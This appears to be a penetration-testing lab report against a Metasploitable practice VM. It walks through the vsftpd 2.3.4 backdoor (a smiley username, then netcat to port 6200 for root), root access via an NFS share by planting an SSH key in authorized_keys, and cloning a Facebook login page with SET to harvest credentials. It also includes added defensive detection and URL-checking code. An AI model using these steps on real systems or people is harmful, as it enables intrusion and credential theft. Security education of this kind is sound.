Task 1
- Start Metasploitable VM
Figure 1: Start Metasploitable
Figure 1 shows that Metasploitable has started.
- Log in as msfadmin with a password of msfadmin
Figure 2: Login
Figure 2 shows the login to Metasploitable with the username msfadmin and the password msfadmin.
- Execute ifconfig
Figure 3: Execute ifconfig
Figure 3 shows ifconfig being executed; the IP address of Metasploitable is 192.168.109.128.
- Start Kali
Figure 4: Start Kali and login
Figure 4 shows Kali started and logged in.
- Ping Metasploitable (192.168.109.128) from Kali
Figure 5: Ping Metasploitable
In figure 5, Metasploitable is pinged from Kali using the IP address found in step 3.
- Scanning the Metasploitable Target with Nmap
nmap -A -p20-21 192.168.109.128
Figure 6: Scan Metasploitable using Nmap
In figure 6, Metasploitable is scanned with nmap -A -p20-21 192.168.109.128; port 21 is open and running vsftpd 2.3.4, which is exploited in the following steps.
- Understanding the Backdoor
Googling vsftpd 2.3.4 quickly shows articles explaining the backdoor, as shown below.
Figure 7: Explanation of the vulnerability found
Figure 7 shows an article explaining the vsftpd 2.3.4 backdoor.
- On Kali, in a Terminal window, execute these commands:
apt-get update
apt install ftp -y
FTP installs, as shown below.
Figure 8: Install and update FTP
Figure 8 shows the package lists being updated and the FTP client being installed with the commands shown above.
- On Kali, in a Terminal window, execute this command, replacing the IP address with the IP address of your Metasploitable machine.
ftp 192.168.109.128
Enter a username of
aa:)
and type anything for the password.
There is no response; the login seems to hang, as shown below.
Figure 9: Connecting to Metasploitable from Kali
In figure 9, an FTP connection to Metasploitable is opened from Kali with the command shown above.
- Open a new Terminal window and execute this command, replacing the IP address with the IP address of your Metasploitable machine.
nc 192.168.109.128 6200
There is no prompt, but you have a shell. To see that, execute these commands:
whoami
uname -a
You're root on Metasploitable, as shown below.
Figure 10: Root privilege gained
Figure 11: Root privilege gained
Figures 10 and 11 show that root privileges on Metasploitable have been gained.
Metasploitable is a Linux virtual machine that lets users practise penetration-testing techniques, conduct security training and test security tools; it is also used to practise and learn Metasploit. In this task, through each of the steps above, we learnt how to exploit a vulnerability found with Nmap from Kali in order to gain root privileges on Metasploitable.
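From the defender's side, the sequence above leaves a recognisable trace on the network: a client connects to the FTP port and, shortly afterwards, to port 6200 on the same host. The following is an added example, not part of the original lab report, that parses a connection log and flags that pattern. The log format (one line per connection: timestamp, source IP, "->", destination IP:port) and the function names are assumptions made for this example, and the log lines are constructed.

```python
# Added example (not part of the original lab report): detect the two-step
# pattern used above, an FTP connection on port 21 followed by a connection
# to the backdoor port 6200 from the same client, in a connection log.
# The log format below is an assumption made for this example:
#     <ISO timestamp> <src ip> -> <dst ip>:<dst port>
from dataclasses import dataclass
from datetime import datetime, timedelta

FTP_PORT = 21
BACKDOOR_PORT = 6200  # port opened by the vsftpd 2.3.4 backdoor

# Constructed sample log: one client that follows the FTP-then-6200 pattern,
# one normal SSH login, and one client that only touches port 6200.
SAMPLE_LOG = """
2024-03-05T10:00:01 192.168.109.129 -> 192.168.109.128:21
2024-03-05T10:00:25 192.168.109.129 -> 192.168.109.128:6200
2024-03-05T10:05:00 192.168.109.140 -> 192.168.109.128:22
2024-03-05T11:30:00 192.168.109.141 -> 192.168.109.128:6200
"""


@dataclass(frozen=True)
class Flow:
    ts: datetime
    src: str
    dst: str
    dport: int


def parse_flow_log(lines):
    """Parse lines in the assumed format into Flow records; blank lines are skipped."""
    flows = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ts_text, src, arrow, dst_port = line.split()
        if arrow != "->":
            raise ValueError(f"unexpected log line: {line}")
        dst, port = dst_port.rsplit(":", 1)
        flows.append(Flow(datetime.fromisoformat(ts_text), src, dst, int(port)))
    return flows


def find_backdoor_sequences(flows, window=timedelta(minutes=10)):
    """Return (src, dst, ts) for each port-6200 connection that was preceded,
    within `window`, by a port-21 connection from the same client to the same host."""
    last_ftp = {}  # (src, dst) -> timestamp of the most recent FTP connection
    hits = []
    for flow in sorted(flows, key=lambda f: f.ts):
        key = (flow.src, flow.dst)
        if flow.dport == FTP_PORT:
            last_ftp[key] = flow.ts
        elif flow.dport == BACKDOOR_PORT:
            ftp_ts = last_ftp.get(key)
            if ftp_ts is not None and flow.ts - ftp_ts <= window:
                hits.append((flow.src, flow.dst, flow.ts))
    return hits


def backdoor_port_clients(flows):
    """Every client that talked to port 6200 at all; nothing legitimate listens there by default."""
    return {flow.src for flow in flows if flow.dport == BACKDOOR_PORT}


if __name__ == "__main__":
    flows = parse_flow_log(SAMPLE_LOG.splitlines())
    for src, dst, ts in find_backdoor_sequences(flows):
        print(f"ALERT {ts.isoformat()} {src} -> {dst}: FTP connection followed by port 6200 connection")
    print("clients touching port 6200:", sorted(backdoor_port_clients(flows)))
```

The stricter check is the ordered pair (FTP then 6200); the looser one, any traffic to port 6200, is still worth an alert on a host where that port should never be open. Removing or updating vsftpd 2.3.4 is the actual fix; the detection only tells you the host was reached.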
Task 2 Exploiting NFS and SSH
1. Scanning the Metasploitable Target with Nmap
From your Kali machine, in a Terminal, execute this command, replacing the IP address with the IP address of your Metasploitable machine.
nmap -A 192.168.109.128
Nmap produces several screens of output.
Find the results for port 111. It detected nfs, as shown below.
Figure 12: Execute nmap -A 192.168.109.128
Figure 12 shows the command nmap -A 192.168.109.128 being executed.
Figure 13: Result of nmap -A 192.168.109.128
Figure 13 shows the result of nmap -A 192.168.109.128; the NFS service is found to be open.
2. Enumerating NFS
NFS (Network File System) is used by Linux to share files.
Nmap has a script to enumerate NFS shares.
From your Kali machine, in a Terminal, execute this command to read the script's documentation:
nmap --script-help nfs-ls
Figure 14: Help text of nmap --script-help nfs-ls
Figure 14 shows the help text that nmap --script-help nfs-ls displays, describing what the nfs-ls script does.
3. From your Kali machine, in a Terminal, execute this command, replacing the IP address with the IP address of your Metasploitable machine.
nmap --script=nfs-ls 192.168.109.128
The volume / is shared, with "Read" and "Modify" permissions, as shown below.
Figure 15: NFS share listing of Metasploitable 192.168.109.128
Figure 15 shows the files on the NFS share of Metasploitable 192.168.109.128, including the permissions of each file.
4. Mounting the NFS Share
From your Kali machine, in a Terminal, execute these commands, replacing the IP address with the IP address of your Metasploitable machine.
These commands install some software needed to use nfs shares, and mount the shared folder on your Kali system in the /tmp folder.
apt-get update
apt-get install nfs-common -y
mkdir /tmp/mount
mount -t nfs 192.168.109.128:/ /tmp/mount -o nolock
cd /tmp/mount
ls
You see all the folders expected at the root of a Linux system, as shown below.
Figure 16: Update package lists
In figure 16, the Kali package lists are updated.
Figure 17: Install nfs-common
In figure 17, nfs-common is installed.
Figure 18: /tmp/mount is created
Figure 18 shows that /tmp/mount is created using the command shown above.
Figure 19: List files under /tmp/mount
In figure 19, /tmp/mount is checked to confirm it was created, and the files it contains are listed.
5. From your Kali machine, in a Terminal, execute these commands to find the SSH keys for the "msfadmin" user.
cd home
cd msfadmin
ls -al
cd .ssh
ls -l
Three files are found, as shown below.
- authorized_keys
- id_rsa
- id_rsa.pub
Figure 20: Obtain file contained in .ssh
Figure 20 shows the steps to list the files in .ssh and identify the file that stores the authorized keys.
6. Let's look at these files.
From your Kali machine, in a Terminal, execute these commands.
ls
cat authorized_keys
The authorized_keys file contains public keys of authorized users, as shown below.
Figure 21: Check keys stored in the authorized_keys file
Figure 21 shows the key stored in authorized_keys.
7. Generating SSH Keys
To exploit the Metasploitable box, we'll add our public SSH key to the authorized_keys file. So first we need to generate keys.
From your Kali machine, in a Terminal, execute this command:
ssh-keygen
The keys are generated and placed in the /root/.ssh directory, as shown below.
Figure 22: Generate public key
Figure 22 shows that an SSH key pair is generated and stored in /root/.ssh.
8. Adding Your Public Key to authorized_keys
From your Kali machine, in a Terminal, execute these commands:
cat /root/.ssh/id_rsa.pub >> ./authorized_keys
cat authorized_keys
Your key appears at the end of the file, as shown below.
Figure 23: Append generated public key to authorized_keys file
In figure 23, the generated public key is appended to the authorized_keys file.
Figure 24: Check keys contained in authorized_keys file
Figure 24 shows the contents of authorized_keys being checked to ensure the generated ssh-rsa key was appended successfully.
9. Connecting via SSH
From your Kali machine, in a Terminal, execute this command, replacing the IP address with the IP address of your Metasploitable machine.
ssh msfadmin@192.168.109.128
You get a shell as the "msfadmin" user, as shown below.
Figure 25: Connect to Metasploitable using ssh
In figure 25, an SSH connection to Metasploitable as msfadmin is made from Kali.
Note: sometimes the connection fails with the message "unable to negotiate with 192.168.109.128 port 22: no matching host key type found. their offer: ssh-rsa,ssh-dss".
Solution: create a file named 'config' (no extension) in the .ssh directory with the following content:
Host *
HostKeyAlgorithms +ssh-rsa
PubkeyAcceptedKeyTypes +ssh-rsa
This happens because newer OpenSSH versions no longer accept the ssh-rsa host key algorithm by default. The fix is either to uninstall the newer version and install an older one, or to create the config file above. Note that Host * applies the relaxed setting to every server; limiting it to the lab host (Host 192.168.109.128) keeps the default for all other connections.
10. Adding Your Public Key to Root's authorized_keys
To get root access, all you need to do is add that public key to the root user's authorized_keys file.
From your Kali machine, in a Terminal, execute these commands, replacing the IP address with the IP address of your Metasploitable machine.
cd /tmp/mount/root/.ssh
cat /root/.ssh/id_rsa.pub >> ./authorized_keys
ssh root@192.168.109.128
whoami
You get a root shell, as shown below.
Figure 26: Add public key to root user's authorized_keys file
In figure 26, the public key is added to the root user's authorized_keys file and root access to Metasploitable is obtained.
Figure 27: Root access gained
In figure 27, root access to Metasploitable is gained via SSH.
Network File System (NFS) is a Linux protocol that lets a machine share files and directories with other Linux machines on the same network, while SSH is a protocol that lets two machines communicate and exchange data. In this task, we learned how to transfer files between Kali and Metasploitable using NFS and SSH. We also learned how to generate a key pair, add its public key as an authorized key, and use the generated key to gain root access to Metasploitable.
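Steps 8 and 10 work because a key appended to authorized_keys is trusted without anyone reviewing the file. The following is an added example, not part of the original lab report, that audits an authorized_keys file against an allowlist of key fingerprints, computing the same SHA256 fingerprint form that ssh-keygen -l prints. The function names are assumptions, and the key blobs are constructed placeholders (a length-prefixed "ssh-rsa" header followed by a label), not real key material.

```python
# Added example (not part of the original lab report): audit an
# authorized_keys file against an allowlist of known key fingerprints, which
# is how a defender would notice the key appended to root's file above.
# The key blobs below are constructed placeholders, not real key material.
import base64
import hashlib
import shlex

KEY_TYPES = ("ssh-rsa", "ssh-dss", "ssh-ed25519",
             "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521")


def fingerprint(b64_blob):
    """SHA256 fingerprint in the form ssh-keygen -l prints: base64 of the
    SHA-256 digest of the decoded key blob, with '=' padding removed."""
    digest = hashlib.sha256(base64.b64decode(b64_blob)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text):
    """Return one dict per key line: options, key type, fingerprint, comment.
    Malformed lines are returned with valid=False so an audit cannot miss them."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = shlex.split(line)  # handles quoted option values such as from="a,b"
        idx = next((i for i, t in enumerate(tokens) if t in KEY_TYPES), None)
        if idx is None or idx + 1 >= len(tokens):
            entries.append({"valid": False, "line": line})
            continue
        entries.append({
            "valid": True,
            "options": tokens[:idx],
            "type": tokens[idx],
            "fingerprint": fingerprint(tokens[idx + 1]),
            "comment": " ".join(tokens[idx + 2:]),
        })
    return entries


def audit_authorized_keys(text, allowlist):
    """Entries whose fingerprint is not in `allowlist`, plus any malformed lines."""
    return [e for e in parse_authorized_keys(text)
            if not e["valid"] or e["fingerprint"] not in allowlist]


def _placeholder_blob(label):
    """Constructed stand-in for a key blob: the length-prefixed 'ssh-rsa'
    header a real blob starts with, followed by a label instead of key data."""
    return base64.b64encode(b"\x00\x00\x00\x07ssh-rsa" + label.encode()).decode()


KNOWN_BLOB = _placeholder_blob("msfadmin-lab-key")
ROGUE_BLOB = _placeholder_blob("appended-from-kali")
ALLOWLIST = {fingerprint(KNOWN_BLOB)}  # fingerprints the administrator issued

# Constructed sample: the second key was not issued by the administrator.
SAMPLE_AUTHORIZED_KEYS = f"""
# constructed sample authorized_keys
ssh-rsa {KNOWN_BLOB} msfadmin@metasploitable
from="192.168.109.129" ssh-rsa {ROGUE_BLOB} root@kali
"""


if __name__ == "__main__":
    for entry in audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, ALLOWLIST):
        if entry["valid"]:
            print(f"UNKNOWN KEY {entry['fingerprint']} ({entry['comment']})")
        else:
            print(f"MALFORMED LINE {entry['line']}")
```

Fingerprints rather than comments are the right thing to allowlist: the comment field is free text that anyone writing the file can set, while the fingerprint is bound to the key material. The audit is only as good as the file's write protection, which is why the NFS export check matters as much as this one.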
Task 3
Social engineering using Kali Linux
Using the Kali Linux Social Engineering Toolkit to clone a website and send the cloned link to a victim. Once the victim attempts to log in to the website through the link, their credentials are extracted in the Linux terminal.
Steps:
1. Open Kali Linux
2. Go to Applications
3. Click Social Engineering Tools
4. Click Social Engineering Toolkit
Figure 28: Search for social engineering toolkit
Figure 28 shows that social engineering toolkit is found in Kali.
5. Enter “Y” to proceed
Figure 29: Run social engineering toolkit
Figure 29 shows the Social Engineering Toolkit running; "Y" is entered to proceed.
6. Type “1” for Social Engineering Attacks
Figure 30: List of options in the initial menu
Figure 30 shows the list of options; Social Engineering Attacks is selected by entering 1.
7. Type "2" for Website Attack Vectors
Figure 31: List of options after selecting Social Engineering Attacks
Figure 31 shows the list of options; Website Attack Vectors is selected by entering 2, as shown in figure 32.
8. Type "3" for Credential Harvester Attack Method
Figure 32: List of options after selecting Website Attack Vectors
Figure 32 shows the list of options; Credential Harvester Attack Method is selected by entering 3, as shown in figure 33.
9. Type "2" for Site Cloner
Figure 33: List of options after selecting Credential Harvester Attack Method
Figure 33 shows the list of options; Site Cloner is selected by entering 2, as shown in figure 34.
10. Type the IP address of the Kali Linux machine
Figure 34: Site Cloner selected
Figure 35: Enter IP address
Figure 35 shows that the IP address of Kali (192.168.109.129) is entered.
11. Type target URL
Figure 36: Enter target URL
Figure 36 shows that the target URL to be cloned is entered, which is https://www.facebook.com/login/.
12. Now http://(IP from step 10) is used. You can use this address directly, but that is not effective in a real scenario; there the address would be hidden behind a fake URL and forwarded to the victim. Because the site is cloned, the user cannot identify the fake website unless they inspect the URL. If they click the link and attempt to log in, the credentials are captured in the Linux terminal. Here we use http://(IP from step 10) to proceed.
Figure 37: Website cloned
Figure 37 shows a fake website of Facebook login page cloned.
13. Login using username and password
Username: admin
Password: Admin@123
Figure 38: Login using website cloned
In figure 38, the user logs in on the cloned website with username aa and password bb.
14. Go back to Linux terminal and observe
Figure 39: Possible username and password captured
Figure 39 shows the input in the username and password field of fake website.
Figure 40: Credential capture terminated, and report generated
Figure 40 shows that credential capture has been terminated and the report of the captured input is generated.
Figure 41: Report generated
Figure 41 shows the generated report, which is stored in a local directory of the Linux machine (/root/.set/reports).
Figure 42: Detail of report generated
Figure 42 shows the content of the generated report, which contains the credentials captured from the fake website.
The Social Engineering Toolkit lets a user perform various types of social engineering attack. In this task, the credential harvester attack method is used by cloning a website: the clone is a fake website used for phishing, and credentials entered on it are saved and retrieved. Our target in this task is a user of Facebook, since the cloned page is the Facebook login page. In this task, we learned how to clone a website in order to obtain a legitimate user's credentials for that website.
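Step 12 makes the defensive point: the clone is visually identical, so the URL is the only thing the victim can check. The following is an added example, not part of the original lab report, that turns that check into code. It compares a login link against the expected login domain and lists the reasons it should not be trusted: a bare IP address as host (as in the lab), plain http instead of https, a user@ prefix that hides the real host, or a host that is neither the expected domain nor a subdomain of it. The function name is an assumption and the sample links are constructed.

```python
# Added example (not part of the original lab report): step 12 says the
# victim can only spot the clone by looking at the URL, so this function
# encodes that check. It returns the reasons a login link is suspicious
# relative to the expected login domain; the sample URLs are constructed.
import ipaddress
from urllib.parse import urlsplit


def check_login_url(url, expected_domain):
    """Return a list of reasons `url` should not be trusted as a login page
    for `expected_domain`; an empty list means no problem was found."""
    reasons = []
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    expected = expected_domain.lower().lstrip(".")

    if parts.scheme != "https":
        reasons.append(f"scheme is '{parts.scheme or 'none'}', not https")
    if parts.username is not None:
        reasons.append("URL carries a user@ prefix, which can disguise the real host")

    try:
        ipaddress.ip_address(host)
    except ValueError:
        # Not an IP literal: the host must be the expected domain or a subdomain of it.
        # A lookalike such as www.facebook.com.something.example fails this test
        # because the expected domain is not its suffix.
        if host != expected and not host.endswith("." + expected):
            reasons.append(f"host '{host}' is not {expected} or a subdomain of it")
    else:
        reasons.append(f"host is a bare IP address ({host})")
    return reasons


# Constructed sample links: the genuine page, the lab clone, and two lookalikes.
SAMPLE_LINKS = [
    "https://www.facebook.com/login/",
    "http://192.168.109.129/",
    "https://www.facebook.com.login-check.example/login",
    "https://www.facebook.com@login-check.example/",
]


if __name__ == "__main__":
    for link in SAMPLE_LINKS:
        problems = check_login_url(link, "facebook.com")
        print(link, "->", "ok" if not problems else "; ".join(problems))
```

This is the check a mail gateway or a browser extension would apply before a user ever sees the page; in the lab the clone fails on two counts (http and an IP-literal host), and the lookalike domains fail on the suffix test.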